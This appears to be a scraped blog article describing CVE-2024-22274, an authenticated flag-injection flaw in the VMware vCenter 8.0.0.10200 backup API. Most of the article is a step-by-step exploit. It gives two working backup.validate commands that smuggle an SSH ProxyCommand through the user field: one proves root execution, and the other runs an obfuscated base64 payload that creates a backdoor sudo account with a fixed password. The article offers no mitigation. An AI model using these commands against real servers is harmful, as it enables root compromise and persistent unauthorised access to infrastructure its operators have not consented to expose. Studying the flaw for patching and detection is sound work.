.png)
4 months ago
46 BOOK THIS SPACE FOR AD
ARTICLE AD
CVE-2024–22274 is a critical vulnerability in VMware vCenter Server version 8.0.0.10200, allowing for authenticated remote code execution. This vulnerability is particularly severe because it can be exploited to gain root access to the target system.
Affected Software: VMware vCenter 8.0.0.10200Underlying OS: Photon LinuxThe vulnerability resides in the API components:
com.vmware.appliance.recovery.backup.job.createcom.vmware.appliance.recovery.backup.validateThese components are susceptible to a flag injection attack. This type of attack can inject malicious flags into system commands executed by the API, allowing an attacker to run arbitrary commands as the root user.
Steps to Exploit the Vulnerability
Login to vCenter Server: Use SSH to log in as a user with the “admin” role.
Identify Vulnerable Commands: Utilize tools like pspy to inspect system commands executed by the vulnerable API components.
Flag Injection: Inject a malicious SSH flag using the --username field of the backup.validate command. For example:
backup.validate --parts common --locationType SFTP --location nowhere --locationUser '-o ProxyCommand=;/bin/touch /tmp/root!!! 2>' --locationPasswordThis command creates a file /tmp/root!!! owned by the root user, demonstrating the ability to execute commands with root privileges.
Create a New User with Root Access: Exploit the vulnerability to create a new user with SSH access and root privileges:
backup.validate --parts common --locationType SFTP --location nowhere --locationUser '-o ProxyCommand=;/bin/bash -c "{echo,dXNlcmFkZCBtYWxaICYmIGVjaG8gLWUgIk1hbElzSGVyZTEjXG5NYWxJc0hlcmUxIyIgfCBwYXNzd2QgbWFsWiA7IHVzZXJtb2QgLXMgL2Jpbi9iYXNoIG1hbFogJiYgdXNlcm1vZCAtYUcgc3VkbyBtYWxaCg==}|{base64,-d}|bash" 2>' --locationPasswordThe command above decodes and executes a base64 encoded payload that creates a new user malZ with the password MalIsHere1# and adds this user to the sudo group.
Bengali (Bangladesh) · 
English (United States) ·